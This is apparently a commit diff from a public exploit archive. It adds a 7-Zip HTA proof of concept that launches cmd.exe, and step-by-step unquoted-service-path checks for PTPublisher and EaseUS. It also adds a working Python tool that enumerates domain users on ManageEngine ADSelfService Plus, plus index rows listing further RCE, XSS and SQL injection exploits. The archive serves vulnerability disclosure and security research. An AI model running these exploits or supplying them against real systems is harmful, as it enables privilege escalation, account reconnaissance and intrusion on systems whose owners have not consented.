# About:
7-Zip through 21.07 on Windows allows privilege escalation and command execution when a file with the .7z extension is dragged to the Help>Contents area.
# Proof of Concept:
<html>
<head>
<HTA:APPLICATION ID="7zipcodeexec">
<script language="jscript">
var c = "cmd.exe";
new ActiveXObject('WScript.Shell').Run(c);
</script>
<head>
<html>

37
exploits/windows/local/50885.txt Normal file
View file

@ -0,0 +1,37 @@
# Exploit Title: PTPublisher v2.3.4 - Unquoted Service Path
# Discovery by: bios
# Discovery Date: 2022-18-04
# Vendor Homepage: https://www.primera.com/
# Tested Version: 2.3.4
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Microsoft Windows 10 Pro x64
# Step to discover Unquoted Service Path:
C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto"
|findstr /i /v "c:\windows\\" |findstr /i /v """
PTProtect
PTProtect
C:\Program Files (x86)\Primera
Technology\PTPublisher\UsbFlashDongleService.exe
Auto
C:\>sc qc PTProtect
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: PTProtect
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\PrimeraTechnology\PTPublisher\UsbFlashDongleService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : PTProtect
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\>systeminfo
Host Name: DESKTOP-OUHAB1I
OS Name: Microsoft Windows 10 Pro
OS Version: 10.0.19044 N/A Build 19044

35
exploits/windows/local/50886.txt Normal file
View file

@ -0,0 +1,35 @@
# Exploit Title: EaseUS Data Recovery - 'ensserver.exe' Unquoted Service Path
# Discovery by: bios
# Discovery Date: 2022-18-04
# Vendor Homepage: https://www.easeus.com/
# Tested Version: 15.1.0.0
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Microsoft Windows 10 Pro x64
# Step to discover Unquoted Service Path:
C:\>wmic service get name,pathname,displayname,startmode | findstr /i auto
| findstr /i /v "C:\Windows\\" | findstr /i /v """
EaseUS UPDATE SERVICE
EaseUS UPDATE SERVICE C:\Program Files
(x86)\EaseUS\ENS\ensserver.exe Auto
C:\>sc qc "EaseUS UPDATE SERVICE"
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: EaseUS UPDATE SERVICE
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\EaseUS\ENS\ensserver.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : EaseUS UPDATE SERVICE
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\>systeminfo
Host Name: DESKTOP-HR3T34O
OS Name: Microsoft Windows 10 Home
OS Version: 10.0.19042 N/A Build 19042

63
exploits/windows/remote/50873.py Executable file
View file

@ -0,0 +1,63 @@
# Exploit Title: ManageEngine ADSelfService Plus 6.1 - User Enumeration
# Exploit Author: Metin Yunus Kandemir
# Vendor Homepage: https://www.manageengine.com/
# Software Link: https://www.manageengine.com/products/self-service-password/download.html
# Version: ADSelfService 6.1 Build 6121
# Tested Against: Build 6118 - 6121
# Details: https://github.com/passtheticket/vulnerability-research/blob/main/manage-engine-apps/adselfservice-userenum.md
# !/usr/bin/python3
import requests
import sys
import time
import urllib3
from urllib3.exceptions import InsecureRequestWarning
"""
The domain users can be enumerated like userenum module of the kerbrute tool using this exploit.
If you conducted a brute-force attack against a user, please run the script after 30 minutes (default settings) otherwise the results can be false positive.
"""
def request(target, user):
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
url = target + 'ServletAPI/accounts/login'
data = {"loginName": user}
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0"}
req = requests.post(url, data=data, headers=headers, verify=False)
# For debugging
# print("[*] Response for " + user + ": " + req.text.strip())
if 'PASSWORD' in req.text:
print("[+] " + user + " is VALID!")
elif 'Your account has been disabled' in req.text:
print("[+] " + user + " account has been DISABLED.")
elif 'Your account has expired' in req.text:
print("[+] " + user + " account has EXPIRED.")
elif 'Enter the text as shown in the image.' in req.text:
print("[!] The exploit doesn't detect expired and disabled users. Please, run it after the 30 minutes. ")
elif 'Permission Denied.' in req.text:
print("[-] " + user + " is not found.")
def get_users(target, file):
try:
file = open(file, "r")
for line in file:
line = line.strip()
time.sleep(0.5)
request(target, user=line)
except FileNotFoundError:
print("[-] File not found!")
sys.exit(1)
def main(args):
if len(args) != 3:
print("[*] Usage: %s url usernames_file" % (args[0]))
print("[*] Example: %s https://target/ /tmp/usernames.txt" % (args[0]))
sys.exit(1)
get_users(target=args[1], file=args[2])
if __name__ == "__main__":
main(args=sys.argv)

20
files_exploits.csv
View file

@ -11477,6 +11477,11 @@ id,file,description,date,author,type,platform,port
50852,exploits/windows/local/50852.txt,"Sherpa Connector Service v2020.2.20328.2050 - Unquoted Service Path",1970-01-01,"Manthan Chhabra",local,windows,
50858,exploits/linux/local/50858.txt,"binutils 2.37 - Objdump Segmentation Fault",1970-01-01,"Marlon Petry",local,linux,
50859,exploits/windows/local/50859.txt,"MiniTool Partition Wizard - Unquoted Service Path",1970-01-01,"Saud Alenazi",local,windows,
50867,exploits/windows/local/50867.txt,"Microsoft Exchange Mailbox Assistants 15.0.847.40 - 'Service MSExchangeMailboxAssistants' Unquoted Service Path",1970-01-01,"Antonio Cuomo",local,windows,
50868,exploits/windows/local/50868.txt,"Microsoft Exchange Active Directory Topology 15.0.847.40 - 'Service MSExchangeADTopology' Unquoted Service Path",1970-01-01,"Antonio Cuomo",local,windows,
50883,exploits/windows/local/50883.txt,"7-zip - Code Execution / Local Privilege Escalation",1970-01-01,"Kağan Çapar",local,windows,
50885,exploits/windows/local/50885.txt,"PTPublisher v2.3.4 - Unquoted Service Path",1970-01-01,bios,local,windows,
50886,exploits/windows/local/50886.txt,"EaseUS Data Recovery - 'ensserver.exe' Unquoted Service Path",1970-01-01,bios,local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",1970-01-01,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",1970-01-01,"Marcin Wolak",remote,windows,139
@ -18664,6 +18669,12 @@ id,file,description,date,author,type,platform,port
50856,exploits/hardware/remote/50856.py,"Kramer VIAware - Remote Code Execution (RCE) (Root)",1970-01-01,sharkmoos,remote,hardware,
50857,exploits/multiple/remote/50857.txt,"Opmon 9.11 - Cross-site Scripting",1970-01-01,"Marlon Petry",remote,multiple,
50861,exploits/linux/remote/50861.txt,"Franklin Fueling Systems Colibri Controller Module 1.8.19.8580 - Local File Inclusion (LFI)",1970-01-01,"Momen Eldawakhly",remote,linux,
50870,exploits/hardware/remote/50870.txt,"Zyxel NWA-1100-NH - Command Injection",1970-01-01,"Ahmed Alroky",remote,hardware,
50873,exploits/windows/remote/50873.py,"ManageEngine ADSelfService Plus 6.1 - User Enumeration",1970-01-01,"Metin Yunus Kandemir",remote,windows,
50875,exploits/hardware/remote/50875.txt,"Verizon 4G LTE Network Extender - Weak Credentials Algorithm",1970-01-01,LiquidWorm,remote,hardware,
50878,exploits/hardware/remote/50878.html,"Delta Controls enteliTOUCH 3.40.3935 - Cross-Site Request Forgery (CSRF)",1970-01-01,LiquidWorm,remote,hardware,
50879,exploits/hardware/remote/50879.html,"Delta Controls enteliTOUCH 3.40.3935 - Cross-Site Scripting (XSS)",1970-01-01,LiquidWorm,remote,hardware,
50880,exploits/hardware/remote/50880.txt,"Delta Controls enteliTOUCH 3.40.3935 - Cookie User Password Disclosure",1970-01-01,LiquidWorm,remote,hardware,
6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",1970-01-01,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",1970-01-01,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",1970-01-01,Spoofed,webapps,php,
@ -44710,6 +44721,7 @@ id,file,description,date,author,type,platform,port
50507,exploits/php/webapps/50507.txt,"Employee and Visitor Gate Pass Logging System 1.0 - 'name' Stored Cross-Site Scripting (XSS)",1970-01-01,"İlhami Selamet",webapps,php,
50509,exploits/hardware/webapps/50509.txt,"YeaLink SIP-TXXXP 53.84.0.15 - 'cmd' Command Injection (Authenticated)",1970-01-01,tahaafarooq,webapps,hardware,
50512,exploits/multiple/webapps/50512.py,"Apache HTTP Server 2.4.50 - Remote Code Execution (RCE) (3)",1970-01-01,"Valentin Lobstein",webapps,multiple,
50872,exploits/php/webapps/50872.txt,"Scriptcase 9.7 - Remote Code Execution (RCE)",1970-01-01,luckyt0mat0,webapps,php,
50513,exploits/multiple/webapps/50513.py,"FormaLMS 2.4.4 - Authentication Bypass",1970-01-01,"Cristian \'void\' Giustini",webapps,multiple,
50514,exploits/php/webapps/50514.txt,"WordPress Plugin WP Symposium Pro 2021.10 - 'wps_admin_forum_add_name' Stored Cross-Site Scripting (XSS)",1970-01-01,"Murat DEMİRCİ",webapps,php,
50515,exploits/php/webapps/50515.txt,"WordPress Plugin AccessPress Social Icons 1.8.2 - 'icon title' Stored Cross-Site Scripting (XSS)",1970-01-01,"Murat DEMİRCİ",webapps,php,
@ -44933,3 +44945,11 @@ id,file,description,date,author,type,platform,port
50863,exploits/hardware/webapps/50863.txt,"Telesquare TLR-2855KS6 - Arbitrary File Deletion",1970-01-01,"Momen Eldawakhly",webapps,hardware,
50864,exploits/hardware/webapps/50864.txt,"Razer Sila - Local File Inclusion (LFI)",1970-01-01,"Kevin Randall",webapps,hardware,
50865,exploits/hardware/webapps/50865.txt,"Razer Sila - Command Injection",1970-01-01,"Kevin Randall",webapps,hardware,
50869,exploits/php/webapps/50869.txt,"WordPress Plugin Motopress Hotel Booking Lite 4.2.4 - SQL Injection",1970-01-01,"Mohsen Dehghani",webapps,php,
50871,exploits/php/webapps/50871.rb,"Easy Appointments 1.4.2 - Information Disclosure",1970-01-01,"Alexandre ZANNI",webapps,php,
50874,exploits/php/webapps/50874.txt,"WordPress Plugin Videos sync PDF 1.7.4 - Stored Cross Site Scripting (XSS)",1970-01-01,UnD3sc0n0c1d0,webapps,php,
50876,exploits/php/webapps/50876.txt,"WordPress Plugin Popup Maker 1.16.5 - Stored Cross-Site Scripting (Authenticated)",1970-01-01,"Roel van Beurden",webapps,php,
50877,exploits/php/webapps/50877.txt,"REDCap 11.3.9 - Stored Cross Site Scripting",1970-01-01,"Kendrick Lam",webapps,php,
50881,exploits/php/webapps/50881.txt,"PKP Open Journals System 3.3 - Cross-Site Scripting (XSS)",1970-01-01,"Hemant Kashyap",webapps,php,
50882,exploits/php/webapps/50882.py,"WordPress Plugin Elementor 3.6.2 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,AkuCyberSec,webapps,php,
50884,exploits/php/webapps/50884.txt,"Fuel CMS 1.5.0 - Cross-Site Request Forgery (CSRF)",1970-01-01,"Ali J",webapps,php,

Can't render this file because it is too large.